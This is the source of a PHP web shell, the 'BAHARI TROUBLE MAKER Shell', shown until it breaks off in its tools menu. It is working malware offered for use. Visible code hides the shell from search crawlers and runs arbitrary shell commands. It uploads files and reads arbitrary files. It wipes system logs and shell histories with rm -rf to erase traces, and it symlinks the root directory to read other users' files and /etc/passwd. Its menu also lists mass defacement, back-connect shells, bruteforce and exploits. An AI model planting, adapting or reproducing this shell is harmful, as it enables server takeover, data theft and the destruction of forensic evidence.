shell btm

1. <?php
2. /*BAHARI TROUBLE MAKER Shell
3. BTM SHELL v1.0*/
4. session_start();
5. error_reporting(0);
6. set_time_limit(0);
7. @set_magic_quotes_runtime(0);
8. @clearstatcache();
9. @ini_set('error_log',NULL);
10. @ini_set('log_errors',0);
11. @ini_set('max_execution_time',0);
12. @ini_set('output_buffering',0);
13. @ini_set('display_errors', 0);
14.  
15. $auth_pass = "15ef0ee43032ec645b40f84193c045b5"; // default: asu
16. $color = "#00ff00";
17. $default_action = 'FilesMan';
18. $default_use_ajax = true;
19. $default_charset = 'UTF-8';
20. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
21. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
22. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
23. header('HTTP/1.0 404 Not Found');
24. exit;
25. }
26. }
27.  
28. function login_shell() {
29. ?>
30. <html>
31. <head>
32. <title>BAHARI TROUBLE MAKER</title>
33. <meta name='author' content='BAHARI TROUBLE MAKER'>
34. <meta charset="UTF-8">
35. <style type='text/css'>
36. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
37. html {
38. background-color: black;
39. min-height: 100%;
40. background-repeat: no-repeat;
41. background-attachment: fixed;
42. background-position: center;
43. background-size: cover;
44. color: #ffffff;
45. font-family: 'Ubuntu';
46. font-size: 13px;
47. width: 100%;
48. padding: 0px;
49. -moz-border-radius: 5px;
50. -webkit-border-radius: 5px;
51. border-radius: 5px;
52. }
53. li {
54. display: inline;
55. margin: 5px;
56. padding: 5px;
57. -moz-border-radius: 5px;
58. -webkit-border-radius: 5px;
59. border-radius: 5px;
60. }
61.  
62.  
63.  
64. a {
65. padding: 1px;
66. border: 1px solid white;
67. color: green;
68. text-decoration:
69. none;color: white;
70. font-size:14px;
71. }
72.  
73. a:hover {
74. color: purple;
75. text-decoration: underline;
76. }
77.  
78. b {
79. color: purple;
80.  
81. }
82. input[type=text], input[type=password],input[type=submit] {
83. background: transparent;
84. overflow: hidden;
85. color: black;
86. border: 1px solid black;
87. margin: 5px auto;
88. padding-left: 5px;
89. font-family: 'Ubuntu';
90. font-size: 13px;
91. -moz-border-radius: 5px;
92. -webkit-border-radius: 5px;
93. border-radius: 5px;
94. position:relative;
95. bottom:75px; left:300pt;
96. }
97.  
98. </style>
99. </head>
100. <script> function myFunction() {alert("Login SU..!!"); }</script>
101. <br><br><br>
102. </form><center><ul>
103. <li> <a href="" onclick="myFunction()">&nbsp;Home&nbsp;</a> </li>
104. <li> <a href="" onclick="myFunction()">&nbsp;Server Infos&nbsp;</a> </li>
105. </li><li> <a href="" onclick="myFunction()">&nbsp;Mass Deface&nbsp;</a> </li>
106. <li> <a href="" onclick="myFunction()">&nbsp;Bypass&nbsp;</a> </li>
107. <li> <a href="" onclick="myFunction()">&nbsp;Config&nbsp;</a> </li>
108. <li> <a href="" onclick="myFunction()">&nbsp;Jumping&nbsp;</a> </li>
109. <li> <a href="" onclick="myFunction()">&nbsp;Bruteforce&nbsp;</a> </li>
110. <li> <a href="" onclick="myFunction()">&nbsp;CGI-Telnet&nbsp;</a> </li>
111. <li> <a href="" onclick="myFunction()">&nbsp;Poster&nbsp;</a> </li>
112. <li> <a style='color: red;' href='http://watch8x.com/'>&nbsp;Login&nbsp;</a> </li></ul>
113. </center><hr>
114. <br><br><font color="#006600" size="3pt">Jingklong </font> <font color="#b0b000" size="3pt">-</font> <font color="#009900" size="3pt">BAHARI TROUBLE MAKER</font><br><br>
115. <font color="#00aa00" size="3pt">BAHARI TROUBLE MAKER Shell </font>
116. <font color="#006600" size="3pt">Recoded dari beberapa tool orang untuk membuat shell ini..</font><br><br>
117. <font color="#006600" size="3pt">Terima Kasih dan maaf untuk shell/tool yang sudah kami ambil/recoded <font color="red" size="6pt">Aso lo Pencurry >:(</font>
118. <br>Shell ini dibuat semata2 untuk memudahkan kami melalukan aktivitas sebagai hekerz.. lol..<br>
119. "yen ono seng salah yo tulong dibenerke, tapi yen bener yo ojo disalahke.. kan iso sinau bareng.. wkkwk.." -Kata2 Seseorang :v</font><br><br><br><br><br><br><br>
120. <font color="#006600" size="3pt">Special thankz to : </font><br><font color="pink">Denita :*</font> - All Members BAHARI TROUBLE MAKER<br><br><br><br><font color="#006600" size="3pt">thankz to : </font><br>
121. AnonGhost - IDB-Team - DM - IndoXploit - dan lainnya :v (<font color="purple">Maaf yah dah ambil toolznya :"v</font>) <br><br>
122. <link href='http://fonts.googleapis.com/css?family=Give+You+Glory' rel='stylesheet' type='text/css'>
123. </center></span><footer id="ftr" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent); text-align:right;">
124. <font color="purple" size="3" face="Give You Glory">&copy; BAHARI TROUBLE MAKER Shell 2017</font></footer>
125.  
126. <form method="post">
127. <input type="password" name="pass">
128. </form>
129. <?php
130. exit;
131. }
132. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
133. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
134. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
135. else
136. login_shell();
137. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
138. @ob_clean();
139. $file = $_GET['file'];
140. header('Content-Description: File Transfer');
141. header('Content-Type: application/octet-stream');
142. header('Content-Disposition: attachment; filename="'.basename($file).'"');
143. header('Expires: 0');
144. header('Cache-Control: must-revalidate');
145. header('Pragma: public');
146. header('Content-Length: ' . filesize($file));
147. readfile($file);
148. exit;
149. }
150. ?>
151. <html>
152. <head>
153. <title>BAHARI TROUBLE MAKER</title>
154. <meta name='author' content='BAHARI TROUBLE MAKER'>
155. <meta charset="UTF-8">
156. <style type='text/css'>
157. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
158. html {
159. min-height: 100%;
160. background-color: black;
161. background-repeat: no-repeat;
162. background-attachment: fixed;
163. background-position: center;
164. background-size: cover;
165. color: white;
166. font-family: 'Ubuntu';
167. font-size: 13px;
168. width: 100%;
169. padding: 0px;
170. -moz-border-radius: 5px;
171. -webkit-border-radius: 5px;
172. border-radius: 5px;
173. }
174. li {
175. display: inline;
176. margin: 5px;
177. padding: 5px;
178. -moz-border-radius: 5px;
179. -webkit-border-radius: 5px;
180. border-radius: 5px;
181. }
182. table, th, td {
183. border-collapse:collapse;
184. font-family: Tahoma, Geneva, sans-serif;
185. background: transparent;
186. font-family: 'Ubuntu';
187. font-size: 13px;
188. -moz-border-radius: 5px;
189. -webkit-border-radius: 5px;
190. border-radius: 5px;
191. }
192. .table_home, .th_home, .td_home {
193. border: 1px solid #ffffff;
194. -moz-border-radius: 5px;
195. -webkit-border-radius: 5px;
196. border-radius: 5px;
197. }
198. th {
199. padding: 10px;
200. }
201. a {
202. color: #ffffff;
203. text-decoration: none;
204. }
205. b {
206. padding: 1px;
207. border: 1px solid white;
208. color: green;
209. text-decoration:
210. none;color: white;
211. font-size:14px;
212. }
213. a:hover {
214. color: purple;
215. text-decoration: underline;
216. }
217. tr:hover {
218. background: #444;
219. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
220. color: #FFFFFF; TEXT-DECORATION: none;
221. }
222.  
223. input[type=text], input[type=password],input[type=submit] {
224. background: transparent;
225. overflow: hidden;
226. color: #ffffff;
227. border: 1px solid #ffffff;
228. margin: 5px auto;
229. padding-left: 5px;
230. font-family: 'Ubuntu';
231. font-size: 13px;
232. -moz-border-radius: 5px;
233. -webkit-border-radius: 5px;
234. border-radius: 5px;
235. }
236. textarea {
237. overflow: hidden;
238. border: 1px solid #ffffff;
239. width: 100%;
240. height: 400px;
241. padding-left: 5px;
242. margin: 10px auto;
243. resize: none;
244. background: transparent;
245. color: #ffffff;
246. font-family: 'Ubuntu';
247. font-size: 13px;
248. -moz-border-radius: 5px;
249. -webkit-border-radius: 5px;
250. border-radius: 5px;
251. }
252. a:focus, input:focus, textarea:focus {
253. outline: 0;
254. border-color: rgba(82, 168, 236, 0.8);
255. -webkit-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
256. -moz-box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
257. box-shadow: inset 0 1px 3px rgba(0, 0, 0, 0.1), 0 0 8px rgba(82, 168, 236, 0.6);
258.  
259. select {
260. width: 152px;
261. background: #000000;
262. color: lime;
263. border: 1px solid #ffffff;
264. margin: 5px auto;
265. padding-left: 5px;
266. font-family: 'Ubuntu';
267. font-size: 13px;
268. -moz-border-radius: 5px;
269. -webkit-border-radius: 5px;
270. border-radius: 5px;
271. }
272. option:hover {
273. background: lime;
274. color: #000000;
275. }
276.  
277. </style>
278. </head>
279. <?php
280. function w($dir,$perm) {
281. if(!is_writable($dir)) {
282. return "<font color=red>".$perm."</font>";
283. } else {
284. return "<font color=lime>".$perm."</font>";
285. }
286. }
287. function r($dir,$perm) {
288. if(!is_readable($dir)) {
289. return "<font color=red>".$perm."</font>";
290. } else {
291. return "<font color=lime>".$perm."</font>";
292. }
293. }
294. function exe($cmd) {
295. if(function_exists('system')) {
296. @ob_start();
297. @system($cmd);
298. $buff = @ob_get_contents();
299. @ob_end_clean();
300. return $buff;
301. } elseif(function_exists('exec')) {
302. @exec($cmd,$results);
303. $buff = "";
304. foreach($results as $result) {
305. $buff .= $result;
306. } return $buff;
307. } elseif(function_exists('passthru')) {
308. @ob_start();
309. @passthru($cmd);
310. $buff = @ob_get_contents();
311. @ob_end_clean();
312. return $buff;
313. } elseif(function_exists('shell_exec')) {
314. $buff = @shell_exec($cmd);
315. return $buff;
316. }
317. }
318. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
319. $ar0=explode($marqueurDebutLien, $text);
320. $ar1=explode($marqueurFinLien, $ar0[$i]);
321. return trim($ar1[0]);
322. }
323. function perms($file){
324. $perms = fileperms($file);
325. if (($perms & 0xC000) == 0xC000) {
326. // Socket
327. $info = 's';
328. } elseif (($perms & 0xA000) == 0xA000) {
329. // Symbolic Link
330. $info = 'l';
331. } elseif (($perms & 0x8000) == 0x8000) {
332. // Regular
333. $info = '-';
334. } elseif (($perms & 0x6000) == 0x6000) {
335. // Block special
336. $info = 'b';
337. } elseif (($perms & 0x4000) == 0x4000) {
338. // Directory
339. $info = 'd';
340. } elseif (($perms & 0x2000) == 0x2000) {
341. // Character special
342. $info = 'c';
343. } elseif (($perms & 0x1000) == 0x1000) {
344. // FIFO pipe
345. $info = 'p';
346. } else {
347. // Unknown
348. $info = 'u';
349. }
350. // Owner
351. $info .= (($perms & 0x0100) ? 'r' : '-');
352. $info .= (($perms & 0x0080) ? 'w' : '-');
353. $info .= (($perms & 0x0040) ?
354. (($perms & 0x0800) ? 's' : 'x' ) :
355. (($perms & 0x0800) ? 'S' : '-'));
356. // Group
357. $info .= (($perms & 0x0020) ? 'r' : '-');
358. $info .= (($perms & 0x0010) ? 'w' : '-');
359. $info .= (($perms & 0x0008) ?
360. (($perms & 0x0400) ? 's' : 'x' ) :
361. (($perms & 0x0400) ? 'S' : '-'));
362. // World
363. $info .= (($perms & 0x0004) ? 'r' : '-');
364. $info .= (($perms & 0x0002) ? 'w' : '-');
365. $info .= (($perms & 0x0001) ?
366. (($perms & 0x0200) ? 't' : 'x' ) :
367. (($perms & 0x0200) ? 'T' : '-'));
368. return $info;
369. }
370. function hdd($s) {
371. if($s >= 1073741824)
372. return sprintf('%1.2f',$s / 1073741824 ).' GB';
373. elseif($s >= 1048576)
374. return sprintf('%1.2f',$s / 1048576 ) .' MB';
375. elseif($s >= 1024)
376. return sprintf('%1.2f',$s / 1024 ) .' KB';
377. else
378. return $s .' B';
379. }
380. function findit($mytext,$starttag,$endtag) {
381. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
382. $posRight = stripos($mytext,$endtag,$posLeft+1);
383. return substr($mytext,$posLeft,$posRight-$posLeft);
384. }
385. function ambilKata($param, $kata1, $kata2){
386. if(strpos($param, $kata1) === FALSE) return FALSE;
387. if(strpos($param, $kata2) === FALSE) return FALSE;
388. $start = strpos($param, $kata1) + strlen($kata1);
389. $end = strpos($param, $kata2, $start);
390. $return = substr($param, $start, $end - $start);
391. return $return;
392. }
393. function getsource($url) {
394. $curl = curl_init($url);
395. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
396. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
397. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
398. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
399. $content = curl_exec($curl);
400. curl_close($curl);
401. return $content;
402. }
403. function bing($dork) {
404. $npage = 1;
405. $npages = 30000;
406. $allLinks = array();
407. $lll = array();
408. while($npage <= $npages) {
409. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
410. if($x) {
411. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
412. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
413. $npage = $npage + 10;
414. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
415. } else break;
416. }
417. $URLs = array();
418. foreach($allLinks as $url){
419. $exp = explode("/", $url);
420. $URLs[] = $exp[2];
421. }
422. $array = array_filter($URLs);
423. $array = array_unique($array);
424. $sss = count(array_unique($array));
425. foreach($array as $domain) {
426. echo $domain."\n";
427. }
428. }
429. function reverse($url) {
430. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
431. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
432. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
433. curl_setopt($ch, CURLOPT_HEADER, 0);
434. curl_setopt($ch, CURLOPT_POST, 1);
435. $resp = curl_exec($ch);
436. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
437. $array = explode(",,", $resp);
438. unset($array[0]);
439. foreach($array as $lnk) {
440. $lnk = "http://$lnk";
441. $lnk = str_replace(",", "", $lnk);
442. echo $lnk."\n";
443. ob_flush();
444. flush();
445. }
446. curl_close($ch);
447. }
448. if(get_magic_quotes_gpc()) {
449. function idx_ss($array) {
450. return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
451. }
452. $_POST = idx_ss($_POST);
453. $_COOKIE = idx_ss($_COOKIE);
454. }
455.  
456. if(isset($_GET['dir'])) {
457. $dir = $_GET['dir'];
458. chdir($dir);
459. } else {
460. $dir = getcwd();
461. }
462. $kernel = php_uname();
463. $ip = gethostbyname($_SERVER['HTTP_HOST']);
464. $dir = str_replace("\\","/",$dir);
465. $scdir = explode("/", $dir);
466. $freespace = hdd(disk_free_space("/"));
467. $total = hdd(disk_total_space("/"));
468. $used = $total - $freespace;
469. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=lime>OFF</font>";
470. $ds = @ini_get("disable_functions");
471. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>MYSQL</font>" : "<font color=red>MYSQL</font>";
472. $curl = (function_exists('curl_version')) ? "<font color=lime>CURL</font>" : "<font color=red>CURL</font>";
473. $wget = (exe('wget --help')) ? "<font color=lime>WGET</font>" : "<font color=red>WGET</font>";
474. $perl = (exe('perl --help')) ? "<font color=lime>PERL</font>" : "<font color=red>PERL</font>";
475. $python = (exe('python --help')) ? "<font color=lime>PYTHON</font>" : "<font color=red>PYTHON</font>";
476. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
477. if(!function_exists('posix_getegid')) {
478. $user = @get_current_user();
479. $uid = @getmyuid();
480. $gid = @getmygid();
481. $group = "?";
482. } else {
483. $uid = @posix_getpwuid(posix_geteuid());
484. $gid = @posix_getgrgid(posix_getegid());
485. $user = $uid['name'];
486. $uid = $uid['uid'];
487. $group = $gid['name'];
488. $gid = $gid['gid'];
489. }
490. echo "<font color=lime>".$kernel."</font><br>";
491. echo "<font color=lime>".$user."</font> (".$uid.")-<font color=lime>".$group."</font> (".$gid.")| <font color=lime>".$ip. " |</font>";
492. echo "<font color=lime>| $used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
493. echo "<font color=lime>Safe Mode: $sm | </font>";
494. echo "<font color=lime>Disable Functions</font>: $show_ds<br>";
495. echo "| $mysql | $perl| $python | $wget | $curl |<br>";
496. echo "Current DIR: ";
497. foreach($scdir as $c_dir => $cdir) {
498. echo "<a href='?dir=";
499. for($i = 0; $i <= $c_dir; $i++) {
500. echo $scdir[$i];
501. if($i != $c_dir) {
502. echo "/";
503. }
504. }
505. echo "'>$cdir</a>/";
506. }
507. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]<br>";
508. echo "<form method='post'>
509. <font style='text-decoration: none;'> ~ $ </font>
510. <input type='text' size='20' height='10' name='cmd'><input type='submit' name='do_cmd' value='X'>
511. </form>";
512. if($_POST['do_cmd']) {
513. echo "<pre>".exe($_POST['cmd'])."</pre>";
514. }
515. if($_POST['upload']) {
516. if($_POST['tipe_upload'] == 'biasa') {
517. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
518. $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
519. } else {
520. $act = "<font color=red>failed to upload file</font>";
521. }
522. } else {
523. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
524. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
525. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
526. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
527. $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
528. } else {
529. $act = "<font color=red>failed to upload file</font>";
530. }
531. } else {
532. $act = "<font color=red>failed to upload file</font>";
533. }
534. }
535. }
536. echo "
537. <form method='post' enctype='multipart/form-data'>
538. <input type='radio' name='tipe_upload' value='biasa' checked> ".w($dir,"Current")."
539. <input type='radio' name='tipe_upload' value='home_root'> ".w($_SERVER['DOCUMENT_ROOT'],"Home")."
540. <input type='file' name='ix_file'>
541. <input type='submit' value='upload' name='upload'>
542. </form>";
543. echo $act;
544.  
545.  
546. echo "<hr>";
547. echo "<center>";
548. echo "<ul>";
549. echo "<li> <a href='?'>Home&nbsp;</a> </li>";
550. echo "<li> <a href='?dir=$dir&do=server'>Server Infos</a> </li>";
551. echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> </li>";
552. echo "<li> <a href='?dir=$dir&do=baipas'>Bypass</a> </li>";
553. echo "<li> <a href='?dir=$dir&do=tconf'>Config</a> </li>";
554. echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a> </li>";
555. echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>";
556. echo "<li> <a href='?dir=$dir&do=aeu'>Auto Edit User</a> </li>";
557. echo "<li> <a href='?dir=$dir&do=brut'>Bruteforce</a> </li>";
558. echo "<li> <a href='?dir=$dir&do=cgi'>CGI-Telnet</a> </li>";
559. echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
560. echo "<li> <a href='?dir=$dir&do=poster'>Poster</a> </li>";
561. echo "<li> <a href='?dir=$dir&do=tool'>Tools</a> </li>";
562. echo "<li> <a href='?dir=$dir&do=nyungseb'>Delete Logs</a> </li>";
563. echo "<li> <a style='color: red;' href='?dir=$dir&do=modar'>Kill Shell</a> </li>";
564. echo "<li> <a style='color: red;' href='?logout=true'>Logout</a> </li>";
565. echo "</ul>";
566. echo "</center>";
567. echo "<hr>";
568. if($_GET['logout'] == true) {
569. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
570. echo "<script>window.location='?';</script>";
571.  
572. }
573. elseif($_GET['do'] == 'modar') {
574. $file = $_SERVER['PHP_SELF'];
575. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
576. die('<br><br><b class="tmp"><font color="#ff0000" size="2pt"><center>Wes Kehapus :"</center></font></b><meta http-equiv="refresh" content="3; url=?".$pwd."" />');
577. else
578. echo '<font color="#fff600" size="2pt">unlink error!</font>';
579. }
580. elseif($_GET['do'] == 'nyungseb') {
581. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Logs Eraser</span><center><br>';
582. //exec function madafuck !
583. echo "<table style='margin: 0 auto;'><tr valign='top'><td align='left'>";
584. exec("rm -rf /tmp/logs");
585. exec("rm -rf /root/.ksh_history");
586. exec("rm -rf /root/.bash_history");
587. exec("rm -rf /root/.bash_logout");
588. exec("rm -rf /usr/local/apache/logs");
589. exec("rm -rf /usr/local/apache/log");
590. exec("rm -rf /var/apache/logs");
591. exec("rm -rf /var/apache/log");
592. exec("rm -rf /var/run/utmp");
593. exec("rm -rf /var/logs");
594. exec("rm -rf /var/log");
595. exec("rm -rf /var/adm");
596. exec("rm -rf /etc/wtmp");
597. exec("rm -rf /etc/utmp");
598. exec("rm -rf $HISTFILE");
599. exec("rm -rf /var/log/lastlog");
600. exec("rm -rf /var/log/wtmp");
601.  
602. //shell_exec function madafuck !
603. shell_exec("rm -rf /tmp/logs");
604. shell_exec("rm -rf /root/.ksh_history");
605. shell_exec("rm -rf /root/.bash_history");
606. shell_exec("rm -rf /root/.bash_logout");
607. shell_exec("rm -rf /usr/local/apache/logs");
608. shell_exec("rm -rf /usr/local/apache/log");
609. shell_exec("rm -rf /var/apache/logs");
610. shell_exec("rm -rf /var/apache/log");
611. shell_exec("rm -rf /var/run/utmp");
612. shell_exec("rm -rf /var/logs");
613. shell_exec("rm -rf /var/log");
614. shell_exec("rm -rf /var/adm");
615. shell_exec("rm -rf /etc/wtmp");
616. shell_exec("rm -rf /etc/utmp");
617. shell_exec("rm -rf $HISTFILE");
618. shell_exec("rm -rf /var/log/lastlog");
619. shell_exec("rm -rf /var/log/wtmp");
620.  
621. //passthru function madafuck !
622. passthru("rm -rf /tmp/logs");
623. passthru("rm -rf /root/.ksh_history");
624. passthru("rm -rf /root/.bash_history");
625. passthru("rm -rf /root/.bash_logout");
626. passthru("rm -rf /usr/local/apache/logs");
627. passthru("rm -rf /usr/local/apache/log");
628. passthru("rm -rf /var/apache/logs");
629. passthru("rm -rf /var/apache/log");
630. passthru("rm -rf /var/run/utmp");
631. passthru("rm -rf /var/logs");
632. passthru("rm -rf /var/log");
633. passthru("rm -rf /var/adm");
634. passthru("rm -rf /etc/wtmp");
635. passthru("rm -rf /etc/utmp");
636. passthru("rm -rf $HISTFILE");
637. passthru("rm -rf /var/log/lastlog");
638. passthru("rm -rf /var/log/wtmp");
639.  
640.  
641. //Let the Mother of Functions To Complete The Task wkwkwkw xD!
642. system("rm -rf /tmp/logs");
643. sleep(2);
644. echo'<br><font color="009900" face="Tahoma, Geneva, sans-serif" style="font-size: 10pt">Deleted [+].../tmp/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif>';
645. sleep(2);
646.  
647. system("rm -rf /root/.bash_history");
648. sleep(2);
649. echo'<p>Deleted [+].../root/.bash_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
650.  
651. system("rm -rf /root/.ksh_history");
652. sleep(2);
653. echo'<p>Deleted [+].../root/.ksh_history <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
654.  
655. system("rm -rf /root/.bash_logout");
656. sleep(2);
657. echo'<p>Deleted [+].../root/.bash_logout <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
658.  
659. system("rm -rf /usr/local/apache/logs");
660. sleep(2);
661. echo'<p>Deleted [+].../usr/local/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
662.  
663. system("rm -rf /usr/local/apache/log");
664. sleep(2);
665. echo'<p>Deleted [+].../usr/local/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
666.  
667. system("rm -rf /var/apache/logs");
668. sleep(2);
669. echo'<p>Deleted [+].../var/apache/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
670.  
671. system("rm -rf /var/apache/log");
672. sleep(2);
673. echo'<p>Deleted [+].../var/apache/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
674.  
675. system("rm -rf /var/run/utmp");
676. sleep(2);
677. echo'<p>Deleted [+].../var/run/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
678.  
679. system("rm -rf /var/logs");
680. sleep(2);
681. echo'<p>Deleted [+].../var/logs <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
682.  
683. system("rm -rf /var/log");
684. sleep(2);
685. echo'<p>Deleted [+].../var/log <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
686.  
687. system("rm -rf /var/adm");
688. sleep(2);
689. echo'<p>Deleted [+].../var/adm <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
690.  
691. system("rm -rf /etc/wtmp");
692. sleep(2);
693. echo'<p>Deleted [+].../etc/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
694.  
695. system("rm -rf /etc/utmp");
696. sleep(2);
697. echo'<p>Deleted [+].../etc/utmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
698.  
699. system("rm -rf $HISTFILE");
700. sleep(2);
701. echo'<p>Deleted [+]...$HISTFILE <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
702.  
703. system("rm -rf /var/log/lastlog");
704. sleep(2);
705. echo'<p>Deleted [+].../var/log/lastlog <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
706.  
707. system("rm -rf /var/log/wtmp");
708. sleep(2);
709. echo'<p>Deleted [+].../var/log/wtmp <img src=http://l.yimg.com/us.yimg.com/i/mesg/emoticons7/41.gif></p>';
710.  
711. sleep(4);
712.  
713. echo '</font><br><br><p><font color="00bb00" face="Tahoma, Geneva, sans-serif" style="font-size: 10pt">Your Traces Has Been Successfully Erased From the Server';
714. echo"</td></tr></table>";
715.  
716. }
717. elseif($_GET['do'] == 'symlink') {
718. if ($win) {
719. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
720. }
721. @mkdir('btmsym', 0777);
722. $sempak = "Options all
723.  
724. DirectoryIndex btm.html
725.  
726. AddType text/plain .php
727.  
728. AddHandler server-parsed .php
729.  
730. AddType text/plain .html
731.  
732. AddHandler txt .html
733.  
734. Require None
735.  
736. Satisfy Any";
737. $masuk = @fopen('btmsym/.htaccess', 'w');
738. fwrite($masuk, $sempak);
739. @symlink('/', 'btmsym/btm.txt');
740. $pg = basename(__FILE__);
741. $etc = file_get_contents("/etc/passwd");
742. $etcz = explode("
743. ", $etc);
744. if (is_readable("/etc/passwd")) {
745. echo '<center><br/> <table align="center" border="3" width="400" cellspacing="0" cellpadding="4">';
746. echo '<tr>
747. <td align="center"> <font color="white"> <b>&nbsp;DOMAINS&nbsp;</b></td>
748. <td align="center"> <font color="white"> <b>&nbsp;USERS&nbsp;</b></td>
749. <td align="center"> <font color="white"> <b>&nbsp;SYMLINK&nbsp;</b></td>';
750. $list = scandir("/var/named");
751. foreach ($etcz as $etz) {
752. $etcc = explode(":", $etz);
753. foreach ($list as $domain) {
754. if (strpos($domain, ".db")) {
755. $domain = str_replace('.db', '', $domain);
756. $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
757. if ($owner['name'] == $etcc[0]) {
758. $i+= 1;
759. echo "<tr>
760. <td><a href='http://" . $domain . " '>" . $domain . "</a></td>
761. <td align='center'><font color='white'>" . $owner['name'] . "</font></td>
762. <td align='center'><a href='btmsym/btm.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
763. }
764. }
765. }
766. }
767. flush();
768. flush();
769. }
770. echo "</tr></table></div></html>";
771.  
772. }
773. elseif($_GET['do'] == 'tool') {
774. echo "<center>";
775. echo "<ul>";
776. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
777. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
778. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
779. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
780. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
781. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
782. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
783. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
784. echo "<li> <a href='?dir=$dir&do=wlfd'>WP LFD Exploit</a> </li><br>";
785. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
786. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
787. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
